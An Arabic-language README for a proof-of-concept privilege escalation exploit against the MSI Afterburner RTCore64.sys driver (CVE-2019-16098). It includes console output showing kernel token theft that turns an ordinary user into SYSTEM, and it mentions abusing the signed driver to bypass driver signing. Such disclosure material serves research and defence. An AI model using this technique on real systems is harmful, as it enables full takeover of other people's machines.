
استغلال PoC لتصعيد الامتيازات المحلية لـ CVE-2019-16098
يسمح السائق في Micro-Star MSI Afterburner 4.6.2.15658 (المعروف أيضًا باسم RTCore64.sys و RTCore32.sys) لأي مستخدم مصادق عليه بقراءة وكتابة ذاكرة عشوائية، ومنافذ الإدخال/الإخراج، و MSRs. يمكن استغلال ذلك لتصعيد الامتيازات، وتنفيذ التعليمات البرمجية بامتيازات عالية، وكشف المعلومات. يمكن أيضًا استخدام هذه السواقات الموقعة لتجاوز سياسة توقيع السواقات من Microsoft لنشر تعليمات برمجية ضارة.
لمزيد من التحديثات، قم بزيارة CVE-2019-16098
تحذير: إزاحات مُشفرة بشكل ثابت لنظام Windows 10 x64 الإصدار 1903!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat
C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM
C:\Users\Barakat\source\repos\CVE-2019-16098>